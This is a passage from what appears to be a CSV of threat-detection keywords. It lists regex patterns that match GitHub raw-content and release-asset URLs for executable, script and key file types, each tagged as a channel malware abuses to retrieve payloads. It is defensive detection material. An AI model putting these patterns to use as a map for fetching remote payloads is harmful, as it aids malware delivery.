!","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.pyo*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pyo.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.rar*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.rar.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.raw*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.raw.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.reg*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.reg.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.rgs*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.rgs.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.RGS*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.RGS.{0,1000}","greyware_tool_keyword","github","Github 
raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.run*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.run.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.scpt*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.scpt.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.script*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.script.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.sct*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.sct.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.sh*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.sh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False 
positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.ssh*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.ssh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.sys*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.sys.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.teamserver*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.teamserver.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.temp*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.temp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.tgz*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.tgz.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" 
"*/github.com/*/raw/main/*.tmp*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.tmp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.vb*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.vb.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.vbs*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.vbs.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.vbscript*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.vbscript.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.ws*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.ws.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.wsf*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.wsf.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by 
malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.wsh*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.wsh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.X86*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.X86.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.X86_64*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.X86_64.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.xlam*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.xlam.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.xlm*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.xlm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive 
!","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.xlsm*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.xlsm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/github.com/*/raw/main/*.zip*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*codeload.github.com/*",".{0,1000}codeload\.github\.com\/.{0,1000}","greyware_tool_keyword","github","Github executables download initiated - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*objects.githubusercontent.com/github-production-release-asset-*",".{0,1000}objects\.githubusercontent\.com\/github\-production\-release\-asset\-.{0,1000}","greyware_tool_keyword","github","Github executables download initiated - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.7z*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.7z.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" 
"*raw.githubusercontent.com*.apk*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.apk.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.app*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.app.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.as*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.as.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.asc*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.asc.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.asp*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.asp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.bash*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.bash.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve 
payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.bat*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.bat.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.beacon*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.beacon.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.bin*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.bin.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.bpl*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.bpl.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.c",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.c","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" 
"*raw.githubusercontent.com*.cer*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.cer.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.cmd*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.cmd.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.com*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.com.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.cpp*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.cpp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.crt*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.crt.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.cs*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.cs.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve 
payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.csh*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.csh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.dat*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.dat.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.dll*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.dll.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.docm*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.docm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.dos*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.dos.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" 
"*raw.githubusercontent.com*.exe*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.go*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.go.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.gz*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.gz.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.hta*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.hta.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.iso*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.iso.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.jar*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.jar.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve 
payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.js*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.js.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.lnk*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.lnk.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.log*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.log.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.mac*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.mac.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.mam*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.mam.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" 
"*raw.githubusercontent.com*.msi*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.msp*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.msp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.nexe*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.nexe.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.nim*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.nim.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.otm*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.otm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.out*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.out.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve 
payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.ova*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.ova.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.pem*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pem.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.pfx*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pfx.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.pl*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pl.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.plx*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.plx.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" 
"*raw.githubusercontent.com*.pm*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.ppk*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.ppk.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.ps1*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.ps1.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.psm1*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.psm1.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.pub*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pub.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.py*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.py.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve 
payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.pyc*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pyc.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.pyo*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.pyo.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.rar*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.rar.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.raw*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.raw.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.reg*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.reg.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" 
